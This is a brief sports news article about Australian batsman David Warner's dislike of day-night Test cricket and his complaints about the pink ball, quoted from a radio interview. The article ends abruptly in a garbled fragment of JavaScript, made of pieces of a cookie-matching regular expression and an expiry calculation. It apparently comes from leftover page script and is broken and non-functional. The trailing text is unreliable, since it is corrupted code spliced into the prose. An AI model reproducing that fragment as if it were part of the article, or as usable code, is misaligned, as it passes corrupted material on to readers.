Dave Warner is not a fan of the day-night Test cricket revolution.

The first ever day-night Test in Adelaide between Australia and New Zealand was a huge success, with fans packing Adelaide Oval and TV audiences through the roof.

However, Australian opener Dave Warner does not like the idea.

“Why are we changing a game that has been around for a long, long time?” Warner told Sky Sports Radio.

“At the end of the day, we know what it's about, we know why they're trying to achieve this.

“I don't understand why we're changing the game.

“It's something as players we're going to have to embrace.

“We have to be (backing the concept) at the end of the day.”

Warner also said that the pink ball needs some work.

“We've got to tinker with that ball a bit more," Warner said.

“The only disappointing thing from our point of view is that you've got to get the product right and if the product's not right, it's hard to go out there and play the game.” "(/([.$?*|{}()[]\/+^])/g,"\$1")+"=([^;]*)"));(U[1]):"",();||void 0===time){/1e3+86400),.('')}